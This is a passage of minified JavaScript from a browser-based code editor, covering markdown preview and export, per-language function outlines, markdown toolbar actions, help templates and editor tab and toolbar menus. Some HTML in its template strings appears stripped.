    ";if(-1!=e.html().indexOf(a)){var i=t(e),n=e.html();n=n.replace(a,i),e.html(n)}},i=function(){$(".edit-right-frame .markdown-menu a").die("click").live("click",function(e){stopPP(e);var t=$(this).parents(".right-main"),a=t.find("[data-link='"+$(this).attr("href")+"']");if(0!=a.length){var i=a.offset().top+t.scrollTop()-t.offset().top+"px";t.stop(!0).animate({scrollTop:i},100,"linear")}})},n=function(t,a){e.async("lib/markdown/highlight.min",function(){t.find("pre code").each(function(e,t){hljs.highlightBlock(t),"function"==typeof a&&a()})})},o=function(t,a){e.async(["lib/markdown/katex/katex.min.js","lib/markdown/katex/katex.min.css","lib/markdown/katex/contrib/auto-render.min.js"],function(){renderMathInElement(t[0],[{left:"$$",right:"$$",display:!0}]),$(".katex-display").parent().addClass("markdown-latex"),t.find(".language-latex,.language-math,.language-katex").each(function(){try{var e=katex.renderToString($(this).text());if("string"!=typeof e)return;e='
    '+e+"
    ",$(e).insertBefore($(this).parent()),$(this).parent().remove()}catch(t){}}),"function"==typeof a&&a()})},s=function(){var e="newfile",t=Editor.current().kod.filename;return""!=t&&(t=core.pathThis(t),e=t.substr(0,t.indexOf("."))),e},r=function(t){var a=e("./tpl/markdownPreview.html"),i=template.compile(a),n=i({addStyle:G.staticPath+"js/lib/markdown/katex/katex.min.css",content:t,title:s(),black_theme:Editor.isBlackTheme()});return n=n.replace(/ data-link="#(.*?)">/g,'>')},l=function(e,t){var a=s()+"."+t;switch(t){case"html":$.htmlDownload(r(e),a);break;case"md":var i=Editor.current(),n=i.getValue();$.htmlDownload(n,a);break;case"pdf":$.htmlPrint(r(e));break;default:}};return function(){var s,c,d,p,u=!1,f=!1,h=function(){if(s=Editor.current(),s&&void 0!==s.focus){var e=s.kod.uuid;c=$("#"+e).parent().find(".markdown-preview"),d=$("#"+e).parent().find(".edit-right-frame .right-main"),g(),v(),i()}},m=function(t){e.async("lib/markdown/markdown-it.min",function(){if(c&&0!=c.length&&window.markdownit){var e=window.markdownit({html:!1,breaks:!0,linkify:!0}),i=s.getValue(),r=e.render(i),l=$(".markdown_make_buffer");0==l.length&&($("").appendTo("body"),l=$(".markdown_make_buffer")),l.html(r),a(l),n(l,function(){c.html(l.html())}),(0==c.html().length||t===!0)&&c.html(l.html()),c.html(l.html()),o(l,function(){c.html(l.html()),l.remove(),w()})}})},v=function(){var e,t=function(){return!d.find(".preview-markdown-frame").hasClass("hidden")};s.session.on("changeScrollTop",function(){!f&&t()&&(u=!0,G(!0),clearTimeout(e),e=!1,e=setTimeout(function(){u=!1},1e3))}),s.on("change",function(){!f&&t()&&(u=!0,w(function(){G(!0),clearTimeout(e),e=!1,e=setTimeout(function(){u=!1},1e3)}))})},g=function(){return},b=[],y=[],k=function(){if(void 0!==s.kod.mode&&"markdown"==s.kod.mode&&window.markdownit){b=[];for(var e="\n...\n"+s.getValue(),t=0,a=window.markdownit(),i=a.parse(e,{references:{}}),n=["h1","h2","h3","h4","h5","h6"],o=0;i.length>o;o++)if($.inArray(i[o].tag,n)>=0&&"heading_open"==i[o].type){var r=s.session.documentToScreenPosition(i[o].map[0]-1,2),l=r.row*s.renderer.lineHeight;b.push({start:t,end:l,height:l-t}),t=l}}},x=function(){if(d&&0!=d.length){y=[];var e=0,t=d.scrollTop();c.find("h1,h2,h3,h4,h5,h6").each(function(){var a=$(this).position().top+t+parseInt($(this).css("margin-top"));y.push({start:e,end:a,height:a-e}),e=a})}},w=function(e){clearTimeout(p),p=!1,p=setTimeout(function(){k(),x(),"function"==typeof e&&e()},200)},G=function(e){var t=s.session.getScrollTop(),a=d.scrollTop(),i=function(e,t,a,i){for(var n,o=-1,s=0;e.length>s&&(o=s,n=e[s],!(e[s].end>t));s++);if(!(-1===o||o>=a.length)){var r=(t-n.start)/n.height,l=a[o],c=l.start+l.height*r;o==e.length-1&&t>=n.end-5&&(c=l.end),i(c)}};e?i(b,t,y,function(e){d.stop(!0).animate({scrollTop:e},100,"linear")}):a+d.height()>=d.prop("scrollHeight")-5?s.gotoLine(s.session.getLength()):i(y,a,b,function(e){s.session.setScrollTop(e)})};return h(),{refresh:m,refreshScroll:w,markdownMenu:t,markdown2html:r,markdownDownload:l}}}),define("app/src/edit/tpl/markdownPreview.html",[],'\n\n \n {{title}}\n\n\n\n\nPrint\n\n{{@content}}\n\n\n\n'),define("app/src/edit/functionList",[],function(){var e={php:[{reg:/\n.*?\s*function\s+([_\w]+)\s*\(.*\)*/g,regName:/.*function\s+(.*\))/,regIndex:1,typeExtents:{"function-value":/\s*(private|protected)\s*/,"function-var":/\s*(public)\s*/},type:"function"},{reg:/\s*class\s+(\w*)\s*.*\{/g,regName:/\s*class\s+(\w*)\s*.*\{/,regIndex:1,type:"class"}],javascript:[{reg:/\s*([\$\w'"\[\]\.]+)\s*=\s*function\s*\([\w,\s\*\[\]\<\>&$]*\)\s*\{/g,regName:/\s*([\$\w'"\[\]\.]+)\s*=\s*function\s*(.*)/,regIndex:1,regName_all:[1,2],type:"function function-var"},{reg:/\s*function\s+([\w\s]+)\s*\([\w,\s\*\[\]\<\>&$]*\)\s*\{/g,regName:/\s*function\s+([\w\s]+)\s*(.*)/,regIndex:1,regName_all:[1,2],type:"function function-define"},{reg:/\s*([\w\.]+)\s*:\s*function\s*\([\w,\s\*\[\]\<\>&$]*\)\s*\{/g,regName:/\s*([\w\.]+)\s*:\s*function\s*(\([\w,\s\*\[\]\<\>&$]*\))/,regIndex:1,regName_all:[1,2],type:"function function-value"}],python:[{reg:/\s*class\s+(\w+)\s*\(/g,regName:/\s*class\s+(\w+)\s*\(/,regIndex:1,type:"class"},{reg:/\s*def\s+(\w+)\s*\(.*\)/g,regName:/\s*def\s+(\w+)\s*\(.*\)/,regIndex:1,type:"function"}],ruby:[{reg:/\s*class\s+(\w+)\s*/g,regName:/\s*class\s+(\w+)\s*/,regIndex:1,type:"class"},{reg:/\s*def\s+(\w+)\s*/g,regName:/\s*def\s+(\w+)\s*/,regIndex:1,type:"function"}],golang:[{reg:/\s*class\s+(\w+)\s*/g,regName:/\s*class\s+(\w+)\s*/,regIndex:1,type:"class"},{reg:/\s*func\s+(\w+)\s*.*\{/g,regName:/\s*func\s+(\w+)\s*/,regIndex:1,type:"function"}],java:[{reg:/\s*(final)?\s*(public|private|protected)\s*.*\s+(\w+)\s*\(.*\).*\{/g,regName:/\s*(final)?\s*(public|private|protected)\s*.*\s+(\w+)\s*\(.*\).*\{/,regIndex:3,type:"function"},{reg:/\s*class\s+(\w+)\s*/g,regName:/\s*class\s+(\w+)\s*/,regIndex:1,type:"class"}],csharp:[{reg:/\s*(public|private|protected)\s*.*\s+(\w+)\s*\(.*\).*/g,regName:/\s*(public|private|protected)\s*.*\s+(\w+)\s*\(.*\).*/,regIndex:2,type:"function"},{reg:/\s*class\s+(\w+)\s*/g,regName:/\s*class\s+(\w+)\s*/,regIndex:1,type:"class"}],actionscript:[{reg:/\s*function\s*(\w+)\s*\(.*\).*\s*\{/g,regName:/\s*function\s*(\w+)\s*\(.*\).*\s*\{/,regIndex:1,type:"function"},{reg:/\s*class\s+(\w+)\s*.*\{/g,regName:/\s*class\s+(\w+)\s*.*\{/,regIndex:1,type:"class"}],objectivec:[{reg:/[\+-]\s*\(.*\)\s*(\w+)\s*\:\s*\(.*/g,regName:/[\+-]\s*\(.*\)\s*(\w+)\s*\:\s*\(.*/,regIndex:1,type:"function"},{reg:/[\+-]\s*\([^:\{\}]*\)\s*(\w*)\s*\{/g,regName:/[\+-]\s*\([^:\{\}]*\)\s*(\w*)\s*\{/,regIndex:1,type:"function"},{reg:/@implementation\s+(\w*)/g,regName:/@implementation\s+(\w*)/,regIndex:1,type:"class"},{reg:/#pragma\s+(mark\s+)?(.*)/g,regName:/#pragma\s+(mark\s+)?(.*)/,regIndex:2,type:"mark"}],c_cpp:[{reg:/([\w*]+\s+)+\*?(\w+)\s*\([\w\s\n\*\/\<\>\[\]\.&,:-]*\)\s*\{/g,regName:/\s+(\w+)\s*\(/,regIndex:1,type:"function"},{reg:/\s*(\w+)::~?(\w+)\s*\([\w\s\n\*\/\<\>\[\]\.&,:-]*\)\s*\{/g,regName:/\s*(\w+)::~?(\w+)\s*\(/,regIndex:2,type:"function function-define"},{reg:/\s*class\s+(\w+)\s*:/g,regName:/\s*class\s+(\w+)\s*:/,regIndex:1,type:"class"}]},t=function(e,t){var a=e.match(t.reg);if(a){for(var i=[],n=a.length,o=0,s=e,r=0;n>r;r++){var l={};l.the_match=a[r];var c=l.the_match.match(t.regName);if(c&&!(c.lengthf;f++)l.name+=c[u[f]]}o=o+d+l.the_match.length,s=e.substr(o),l.type=t.type,t.typeExtents!==void 0&&$.each(t.typeExtents,function(e,t){l.the_match.match(t)&&(l.type+=" "+e)}),i.push(l)}}return i}},a=function(a,i){if(void 0!==e[i]){for(var n=e[i],o=[],s=0;n.length>s;s++){var r=t(a,n[s]);r&&Array.prototype.push.apply(o,r)}o.sort(function(e,t){var a="pos_start";return e[a]=t[a]?1:void 0});for(var l=a.split("\n"),c=0,d=o[c],p=0,u=0;l.length>u&&d;u++){for(;d&&d.pos_start>=p&&d.pos_start<=p+l[u].length;)o[c].range={start:{row:u,column:d.pos_start-p},end:{row:u,column:d.pos_end-p}},c++,d=o[c];p=p+l[u].length+1}return o}},i=function(e){return e=e.replace(/[\r\n {]+/gi," "),e=e.replace(/"/gi,"'"),e=e.replace(/\/gi,">")};return function(t){var n="",o='
    No outline for the active view
    ',s=$("#"+t.kod.uuid).parent(),r=s.find(".function-search input"),l=s.find(".function-list-box"),c=function(){var e=Editor.current();if(!e||e.kod===void 0)return l.html(o),void 0;var t=function(e){var t=e.replace(/(^\s*)|(\s*$)/g,"");return t.replace(/(\{$)/,"")},s=e.kod.mode,c=a(e.getValue(),s);if(c===void 0||0==c.length)return l.html(o),void 0;var p=e.getCursorPosition().row;n="";for(var f=0;c.length>f;f++){var h=c[f],m=h.range;if(m){c.length-1>f&&p>=c[f].range.start.row&&c[f+1].range&&c[f+1].range.start.row>p&&(h.type+=" row-select"),f==c.length-1&&p>=c[f].range.start.row&&(h.type+=" row-select");var v=m.start.row+","+m.start.column+","+m.end.row+","+m.end.column,g=t(t(h.the_match)).substr(0,150);n+='
    '+''+''+i(h.name)+"
    "}}r.val()||d(r.val()),u()},d=function(e){if(""==n)return l.html(o),void 0;if(!e||""==e)return l.html(n),u(),void 0;var t=$("
    "+n+"
    ");t.find(".cell").each(function(){var t=$(this).text(),a=t.toLowerCase().indexOf(e.toLowerCase());-1!=a?(t=t.substr(0,a)+""+t.substr(a,e.length)+""+t.substr(a+e.length),$(this).html(t)):$(this).parent().remove()}),l.html(t.html()),p($(l.find(".list-row").get(0)))},p=function(e){if(1==e.length){l.find(".list-row").removeClass("row-select"),e.addClass("row-select");var t=e.attr("data-range"),a=t.split(","),i={start:{row:parseInt(a[0]),column:parseInt(a[1])},end:{row:parseInt(a[2]),column:parseInt(a[3])}};Editor.current()&&(Editor.current().revealRange(i),r.textFocus())}},u=function(){var e=l;if(e.outerHeight()!=e.prop("scrollHeight")){var t=e.scrollTop(),a=t+e.height(),i=e.find(".row-select").index(),n=e.find(".list-row:eq(0)").outerHeight(),o=e.scrollTop();t>i*n?o=i*n:(i+1)*n>a&&(o=i*n-e.height()+n),e.scrollTop(o)}},f=function(){var e="mouse_is_down";l.delegate(".list-row","mouseover mousedown mouseout mouseup",function(t){var a=$(this);switch(t.type){case"mouseover":a.parent().hasClass(e)?p(a):a.addClass("row-hover");break;case"mousedown":p(a),a.parent().addClass(e);break;case"mouseout":a.removeClass("row-hover");break;case"mouseup":a.parent().removeClass(e);break;default:}}),l.bind("mouseup",function(){r.textFocus()}),l.bind("mousedown",function(t){return 1!=t.which?!0:(l.setCapture&&l.setCapture(),$(document).one("mouseup",function(){l.removeClass(e),l.releaseCapture&&l.releaseCapture()}),void 0)});var t=function(){var e=r.val();d(e),""==e?s.find(".search-reset").addClass("hidden"):s.find(".search-reset").removeClass("hidden")};r.unbind("keydown").bind("keydown",function(e){switch(e.keyCode){case 37:break;case 39:break;case 38:0!=s.find(".row-select").prev().length&&(p(s.find(".row-select").prev()),u()),stopPP(e);break;case 40:0!=s.find(".row-select").next().length&&(p(s.find(".row-select").next()),u()),stopPP(e);break;case 27:case 13:p(s.find(".row-select")),r.val(""),t(),Editor.current()&&Editor.current().focus(),stopPP(e);break;default:setTimeout(t,5)}}),s.find(".search-reset").unbind("click").bind("click",function(){r.val(""),t(),Editor.current()&&Editor.current().focus()})};return f(),{refresh:c,support:function(t){return-1==$.inArray(t,objectKeys(e))?!1:!0}}}}),define("app/src/edit/markdownTools",[],function(){var e=function(){return Editor.current()},t={bold:{type:"inline",tag:"**",insert:"**${1:Bold Text}**",title:"Bold (Ctrl-B)","class":"bold"},italic:{type:"inline",tag:"*",insert:"*${1:Italic Text}*",title:"Italic (Ctrl-I)","class":"italic"},strikethrough:{type:"inline",tag:"~~",insert:"~~${1:Strikethrough Text}~~",title:"Strikethrough","class":"strikethrough"},h1:{type:"head",insert:"# ",title:"Header 1

    ","class":"text-height"},h2:{type:"head",insert:"## ",title:"Header 2

    "},h3:{type:"head",insert:"### ",title:"Header 3

    "},h4:{type:"head",insert:"#### ",title:"Header 4

    "},h5:{type:"head",insert:"###### ",title:"Header 5

    "},quote:{type:"head",insert:"> ",title:"Quote
    (Ctrl-Q)","class":"quote-left"},list_order:{type:"head",insert:" 1. ",title:"Unordered list
      (Ctrl-O)","class":"list-ol"},list_unorder:{type:"head",insert:" - ",title:"Ordered list
        (Ctrl-U)","class":"list-ul"},list_task:{type:"head",insert:"- [ ] ",title:"Incomplete task list","class":"check-empty"},list_task_complete:{type:"head",insert:"- [x] ",title:"Complete task list","class":"check"},line:{type:"insert",insert:"\n\n\n----\n$1",title:"Line
        ","class":"minus"},link:{type:"insert",insert:"[${1:}](http://$2)",title:"Link (Ctrl-L)","class":"link"},image:{type:"image",insert:"![${1:}](http://$2)",title:"Image (Ctrl-G)","class":"picture"},table:{type:"insert",insert:"\n\n\n| header 1 | header 2 |\n| ----------- | ----------- |\n| row 1 col 1 | row 1 col 2 |\n| row 2 col 1 | row 2 col 2 |\n\n",title:"Table ","class":"table"},code:{type:"inlineBlock",title:"Code
         (Ctrl-K)","class":"code",inline:{tag:"`",insert:"`${1:Code}`"},block:{tag:"\n```\n",insert:"\n```\n${1:code}\n```\n"}},math:{type:"inlineBlock",title:"Math (Ctrl-M)","class":"superscript",inline:{tag:"$$",insert:"$$${1:Math}$$"},block:{tag:"\n```\n",insert:"\n```math\n${1:}\n```\n"}}},a=function(e,t){var a=e.session.getTextRange(e.getSelectionRange()),i=t.insert;
        -if(""!==a&&(i=i.replace(/\{1:.*\}/g,"{1:"+a+"}")),""!==a){var n=e.getSelectionRange(),o={start:{row:n.start.row,column:n.start.column-t.tag.length},end:n.start},s={start:n.end,end:{row:n.end.row,column:n.end.column+t.tag.length}};e.session.getTextRange(o)==t.tag&&e.session.getTextRange(s)==t.tag&&(e.selection.setSelectionRange({start:o.start,end:s.end}),i="${1:"+a+"}")}ace.snippetManager.insertSnippet(e,i)},i=function(e,t){for(var a=e.getSelectionRange(),i=[],n=a.end.row-a.start.row+1,o=0,s=0;n>s;s++){var r={start:{row:a.start.row+s,column:0},end:{row:a.start.row+s,column:t.insert.length}};i.push(r),e.session.getTextRange(r)==t.insert&&o++}for(var s=0;n>s;s++){var l=i[s];n==o?e.session.doc.remove(l):e.session.doc.insert({row:l.start.row,column:0},t.insert)}},n=function(e,t){var a=e.session.getTextRange(e.getSelectionRange()),i=t.insert;""!==a&&(i=i.replace(/\{1:.*\}/g,"{1:"+a+"}")),ace.snippetManager.insertSnippet(e,i)},o=function(e,t){var i=e.session.getTextRange(e.getSelectionRange()),n=e.getSelectionRange(),o=e.session.getLine(n.start.row),s={type:"inline",tag:t.inline.tag,insert:t.inline.insert,title:t.title};(n.start.row!=n.end.row||i===o.replace(/(^\s*)|(\s*$)/g,""))&&(s={type:"inline",tag:t.block.tag,insert:t.block.insert,title:t.title}),a(e,s)},s=function(){var e=["bold","italic","strikethrough","|","h1","line","quote","list_order","list_unorder","|","link","image","code","table","math"],a="";return $.each(e,function(e,i){if("|"==i)a+="|";else{var n=t[i],o="class='md-tools md-tools-"+i+" "+(n["class"]?"icon-"+n["class"]:"")+"' ";a+=""}}),a},r=function(e){var t={type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"};core.api.pathSelect(t,function(t){core.fileLink(t,function(a){var i=core.pathThis(t),n="!["+i+"]("+a+")";ace.snippetManager.insertSnippet(e,n)})})},l=function(s){var l=t[s],c=e();if(l&&c){switch(l.type){case"inline":a(c,l,s);break;case"head":i(c,l,s);break;case"insert":n(c,l,s);break;case"inlineBlock":o(c,l,s);break;case"image":r(c);break;default:}e().focus()}},c=function(e){e.find(".md-tools[data-action]").bind("click",function(){var e=$(this).attr("data-action");l(e)})},d=function(e){$.each(t,function(a){var i=t[a];if(i.title&&i.title.match(/\((.*)\)/)){var n=i.title.match(/\((.*)\)/)[1],o=n.replace("Ctrl","Command");e.commands.addCommand({name:a,bindKey:{win:n,mac:o},exec:function(e){"ace/mode/markdown"==e.session.$modeId&&l(a)}})}})};return{bindEvent:function(e,t){e.find(".toolbar .content").html(s()),c(e),"ace/mode/markdown"==t.session.$modeId&&d(t)},doAction:l}}),define("app/src/edit/tpl/markdownHelpCN.html",[],'
        \n
        1.标题与文字格式
        \n

        标题

        \n
        \n# 一级标题\n## 二级标题\n### 三级标题\n#### 四级标题\n##### 五级标题\n
        \n

        文字格式

        \n
        \n*斜体*\n**粗体**\n***粗斜体*** \n~~删除线~~\n
        \n

        水平线

        \n
        \n--- \n
        \n了解更多\n
        \n\n
        \n
        2.列表
        \n

        无序列表

        \n
        \n- item 1\n- item 2\n* item 3\n(可以是[减号,星号,加号]+空格)\n
        \n

        有序列表

        \n
        \n1. item 1 [数字+空格]\n2. item 2\n3. item 3\n   - child 1\n   - child 2\n
        \n
        \n\n
        \n
        3.其他
        \n

        图片

        \n
        \n![图片名称](http://图片网址)\n
        \n\n

        连接

        \n
        \n[链接名称](http://链接网址)\n<http://链接网址>\n
        \n\n

        引用

        \n
        \n> 引用\n> 折行可以不加,新起一行要加\n
        \n\n

        代码

        \n
        \n行内代码:`code`\n```\nvar msg = "多行代码";\nalert(msg);\n```\n
        \n\n

        公式

        \n
        \n行内公式 $$E=mc^2$$ ;\n\n多行公式\n$$E=mc^2$$\n\n多行公式2\n```math\nE=mc^2\n```\n
        \n编辑器\n | 公式教程\n
        \n'),define("app/src/edit/tpl/markdownHelp.html",[],'
        \n
        1.Headers and Emphasis
        \n

        Headers

        \n
        \n# Header 1\n## Header 2\n### Header 3\n#### Header 4\n##### Header 5\n
        \n

        Emphasis

        \n
        \n*Emphasis*\n**Strong**\n***Emphasis Strong*** \n~~Strikethrough~~\n
        \n

        Line

        \n
        \n--- \n
        \nLearn More\n
        \n\n
        \n
        2.Lists
        \n

        Unordered list

        \n
        \n- item 1\n- item 2\n* item 3\n(also[- ,* ,+ )\n
        \n

        Ordered list

        \n
        \n1. item 1\n2. item 2\n3. item 3\n   - child 1\n   - child 2\n
        \n
        \n\n
        \n
        3.Others
        \n

        Image

        \n
        \n![Alt text](http://img.png)\n
        \n\n

        Links

        \n
        \n[Link text](http://url)\n<http://url>\n
        \n\n

        Blockquotes

        \n
        \n> Are you \n> ok ?\n
        \n\n

        Code

        \n
        \ninline code:`code`\n```\nvar msg = "Block code";\nalert(msg);\n```\n
        \n\n

        LaTeX Math

        \n
        \ninline $$E=mc^2$$ ;\n\nblock\n$$E=mc^2$$\n\nblock2\n```math\nE=mc^2\n```\n
        \nMath Editor \n
        \n'),define("app/src/edit/tpl/editTabContent.html",[],'
        \n
        \n	\n	\n
        \n\n'),define("app/src/edit/taskTap",[],function(){var e=function(){$(".edit-tab .tab").live("mouseenter",function(){$(this).addClass("hover"),$(this).unbind("mousedown").mousedown(function(e){1!=e.which||$(this).hasClass("this")||$.nodeName(e.target,"A")||($(this).removeClass("hover").addClass("this"),Editor.select($(this).attr("uuid")))}).unbind("mouseup").mouseup(function(e){2==e.which&&Editor.remove($(this).attr("uuid"))})}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")}).die("dblclick").live("dblclick",function(e){stopPP(e)}),$(".edit-tab").die("dblclick").live("dblclick",function(e){Editor.add(),stopPP(e)}),$(".edit-tab .tab .close").live("click",function(){var e=$(this).parent().attr("uuid");Editor.remove(e)})},t=function(){$(".context-menu-list").filter(":visible").trigger("contextmenu:hide")},a=function(){$("body").click(t).contextmenu(t),$.contextMenu({zIndex:9999,selector:".edit-tab-menu",items:{refresh:{name:LNG.refresh+"F5",className:"refresh_tab",icon:"refresh",accesskey:"e"},sep1:"---------",close:{name:LNG.close,icon:"remove",className:"close_self",accesskey:"d"},"close-others":{name:LNG.close_others,icon:"remove",className:"close-others",accesskey:"o"},sep2:"--------","close-left":{name:LNG.close_left,icon:"remove-sign",className:"close-left",accesskey:"l"},"close-right":{name:LNG.close_right,icon:"remove-sign",className:"close-right",accesskey:"r"},sep3:"--------","open-the-path":{name:LNG.open_the_path,icon:"folder-open",className:"edit-open-the-path",accesskey:"n"},preview:{name:LNG.preview,icon:"eye-open",className:"edit_preview",accesskey:"p"}},callback:function(e,t){var a=t.$trigger,i=a.attr("uuid");switch(e){case"refresh":Editor.refresh(i);break;case"close":Editor.remove(i);break;case"close-left":var n=$(".edit-tab .tabs .tab").index(a);$(".edit-tab .tabs .tab:lt("+n+")").each(function(){Editor.remove($(this).attr("uuid"))});break;case"close-right":var n=$(".edit-tab .tabs .tab").index(a);$(".edit-tab .tabs .tab:gt("+n+")").each(function(){Editor.remove($(this).attr("uuid"))});break;case"close-others":$(".edit-tab .tabs .tab").each(function(){var e=$(this).attr("uuid");e!=i&&Editor.remove(e)});break;case"open-the-path":var o=a.attr("title");if(""==o)return Tips.tips(LNG.not_exists,"warning"),void 0;var s=core.pathFather(o),r=ShareData.frameTop();r.core.openPath(s);break;case"preview":Toolbar.doAction("preview");break;default:}}})},i=function(){var e,t,a,i,n=!1,o=!1,s=0,r=0,l=0,c=0,d=0,p=0,u=0,f=0;$(".edit-tab .tab").die("mousedown").live("mousedown",function(t){$.nodeName(t.target,"A")||(e=$.nodeName(t.target,"SPAN")?$(t.target).parent():$(this),1==t.which&&(n=!0,this.setCapture&&this.setCapture(),$(document).mousemove(function(e){m(e)}),$(document).one("mouseup",function(e){g(e),this.releaseCapture&&this.releaseCapture()})))});var h=function(i){o=!0,s=i.pageX,l=i.pageY,$tab_parent=$(".edit-tab"),t=$(".edit-tab .tab"),$(".draggable-dragging").remove(),a=e.clone().addClass("draggable-dragging").prependTo("body"),p=$sizeInt(t.css("margin-right")),u=$tab_parent.width(),f=$tab_parent.get(0).getBoundingClientRect().left,f+=$(window).scrollLeft(),r=e.get(0).getBoundingClientRect().left,d=$sizeInt(t.css("width")),c=$sizeInt(t.css("height"))-2;var n=e.get(0).getBoundingClientRect().top-$sizeInt(e.css("margin-top")),h=i.clientX-s+r;$("body").prepend("
        "),a.css({width:d+"px",top:n,left:h}),e.css("opacity",0)},m=function(i){if(n){0==o&&h(i);var u=i.clientX-s+r,f=i.clientY-l+c;a.css({left:u,top:f}),t.each(function(){var t=$(this).get(0).getBoundingClientRect().left;if(u>t&&t+d/2+p>u){if(e.attr("uuid")==$(this).attr("uuid"))return;v($(this).attr("uuid"),"left")}if(u>t-d/2+p&&t>u){if(e.attr("uuid")==$(this).attr("uuid"))return;v($(this).attr("uuid"),"right")}})}},v=function(a,n){if(!e.is(":animated")||i!=a){i=a,e.stop(!0,!0),$(".insertTemp").remove(),t=$(".edit-tab .tab");var o=e.width(),s=$(".edit-tab .tab-"+a),r=e.clone(!0).insertAfter(e).css({"margin-right":"0px",border:"none"}).addClass("insertTemp");"left"==n?e.after(s).css("width","0px"):(e.before(s).css("width","0px"),s.before(r)),e.animate({width:o+"px"},animate_time),r.animate({width:"0px"},animate_time,function(){$(this).remove(),t=$(".edit-tab .tab")})}},g=function(){if(n=!1,o=!1,startTime=0,$(".dragMaskView").remove(),Editor.current()&&Editor.current().focus(),void 0!=a){var t=e.get(0).getBoundingClientRect().left,i=e.get(0).getBoundingClientRect().top;a.animate({left:t+"px",top:i+"px"},animate_time,function(){e.css("opacity",1),$(this).remove()})}}},n=function(e,t,a){"remove"==e&&t.removeClass("edit-tab-menu");var i=1.4*animate_time,n=150,o=n,s=$(".edit-tab .tab.edit-tab-menu"),r=$sizeInt($(".edit-tab .tabs").width()),l=$sizeInt(s.css("margin-right"))+$sizeInt(s.css("border-right")),c=$sizeInt($(".edit-tab .add").css("width"))+30,d=s.length,p=Math.floor((r-c)/(n+l));switch(d>p&&(o=Math.floor((r-c)/d)-l),e){case"add":$(".edit-tab .tabs .this").css({"margin-top":"30px",width:o}).stop(1,1).animate({"margin-top":"0px"},i),s.animate({width:o+"px"},i);break;case"remove":void 0!=a&&Editor.select(a),t.stop(1,1).animate({width:"0","margin-top":"+=30"},i,function(){t.remove()}),s.stop(1,1).animate({width:o+"px"},i);break;case"resize":s.css("width",o+"px");break;default:}};return{rightMenu:{hidden:t},resetWidth:n,init:function(){e(),i(),a()}}}),define("app/src/edit/toolbar",[],function(){var e=function(){a(),$(".toolbar-menu").bind("click mouseup",stopPP),$(".toolbar-menu").on("mousedown",function(){$(".toolbar-menu").removeClass("select"),$(this).addClass("select"),$(this).contextMenu({action:e})}),window.top==window&&$('.tools [action="fullscreen"]').remove();var e=function(e,t){if(t.parent().hasClass("top-toolbar"))e.css({left:t.offset().left-4,top:t.outerHeight()-1});else if(t.parent().hasClass("bottom-toolbar")){var a=t.offset().left-e.outerWidth()+t.outerWidth()-5;e.css({left:a,top:t.offset().top-e.outerHeight()}),e.addClass("hidden"),setTimeout(function(){e.removeClass("hidden").css({top:t.offset().top-e.outerHeight()})},10)}e.find("input").length>=1&&setTimeout(function(){e.find("input").focus()},10)};$.contextMenu({selector:".menu-view-goto-line",trigger:"none",callback:n,items:{gotoline:{name:LNG.goto,className:"disable gotoline-input",type:"text"}}}),$.contextMenu({selector:".menuViewTab",trigger:"none",callback:n,items:{"soft-Tab":{name:"Soft Tabs (spaces)",className:"soft-tab"},sep1:"---------","tab-size-2":{name:"Tab with:2",className:"tab-size-set tab-size-2"},"tab-size-3":{name:"Tab with:3",className:"tab-size-set tab-size-3"},"tab-size-4":{name:"Tab with:4",className:"tab-size-set tab-size-4"},"tab-size-8":{name:"Tab with:8",className:"tab-size-set tab-size-8"},sep2:"---------","convert-to-space":{name:"Convert To Space",className:"convert-to-space"},"convert-to-tab":{name:"Convert To Tabs",className:"convert-to-tab"}}});for(var t=[{charset:"UTF-8",name:LNG.charset_UTF_8},{charset:"UTF-16",name:LNG.charset_UTF_16},{charset:"BIG5-HKSCS",name:LNG.charset_BIG5_HKSCS},{charset:"BIG5",name:LNG.charset_BIG5},{charset:"CP850",name:""},{charset:"CP932",name:""},{charset:"CP949",name:LNG.charset_CP949},{charset:"CP1133",name:LNG.charset_CP1133},{charset:"CP1250",name:LNG.charset_CP1250},{charset:"CP1251",name:LNG.charset_CP1251},{charset:"CP1252",name:LNG.charset_CP1252},{charset:"CP1253",name:LNG.charset_CP1253},{charset:"CP1254",name:LNG.charset_CP1254},{charset:"CP1255",name:LNG.charset_CP1255},{charset:"CP1256",name:LNG.charset_CP1256},{charset:"CP1257",name:LNG.charset_CP1257},{charset:"CP1258",name:LNG.charset_CP1258},{charset:"EUC-JP",name:LNG.charset_EUC_JP},{charset:"EUC-KR",name:LNG.charset_EUC_KR},{charset:"GB18030",name:LNG.charset_GB18030},{charset:"GBK",name:LNG.charset_GBK},{charset:"Georgian-Academy",name:LNG.charset_Georgian_Academy},{charset:"ISO-8859-1",name:LNG.charset_ISO_8859_1},{charset:"ISO-8859-2",name:LNG.charset_ISO_8859_2},{charset:"ISO-8859-3",name:LNG.charset_ISO_8859_3},{charset:"ISO-8859-4",name:LNG.charset_ISO_8859_4},{charset:"ISO-8859-5",name:LNG.charset_ISO_8859_5},{charset:"ISO-8859-6",name:LNG.charset_ISO_8859_6},{charset:"ISO-8859-7",name:LNG.charset_ISO_8859_7},{charset:"ISO-8859-8",name:LNG.charset_ISO_8859_8},{charset:"ISO-8859-9",name:"-"},{charset:"ISO-8859-10",name:LNG.charset_ISO_8859_10},{charset:"ISO-8859-11",name:LNG.charset_ISO_8859_11},{charset:"ISO-8859-13",name:LNG.charset_ISO_8859_13},{charset:"ISO-8859-14",name:LNG.charset_ISO_8859_14},{charset:"ISO-8859-15",name:LNG.charset_ISO_8859_15},{charset:"ISO-8859-16",name:LNG.charset_ISO_8859_16},{charset:"ISO-2022-JP",name:LNG.charset_ISO_2022_JP},{charset:"KOI8-R",name:LNG.charset_KOI8_R},{charset:"KOI8-T",name:LNG.charset_KOI8_T},{charset:"KOI8-U",name:LNG.charset_KOI8_U},{charset:"Macintosh",name:LNG.charset_Macintosh},{charset:"PT154",name:LNG.charset_PT154},{charset:"SHIFT_JIS",name:LNG.charset_SHIFT_JIS},{charset:"TIS-620",name:LNG.charset_TIS_620},{charset:"ARMSCII-8",name:LNG.charset_ARMSCII_8},{charset:"VISCII",name:LNG.charset_VISCII},{charset:"Windows-1251",name:""},{charset:"Windows-1252",name:""},{charset:"Windows-1254",name:""}],i=function(e){for(var a={},i=0;t.length>i;i++){var n=t[i],o=n.name?" ("+n.name+")":"";a[e+"-"+n.charset]={name:n.charset+o}}return a},s=G.codeFontAll.split(","),r={},l=0;s.length>l;l++){var c=s[l],d=replaceAll(c," 